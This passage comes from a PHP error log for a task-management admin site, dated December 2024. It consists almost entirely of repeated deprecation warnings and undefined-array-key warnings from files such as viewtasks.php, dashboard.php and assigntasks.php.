/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:08:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:10:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:15:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:16:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:53 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:54 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:44:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [05-Dec-2024 22:44:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [05-Dec-2024 23:15:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 23:30:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 23:33:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:34:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:34:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:35:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:36:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 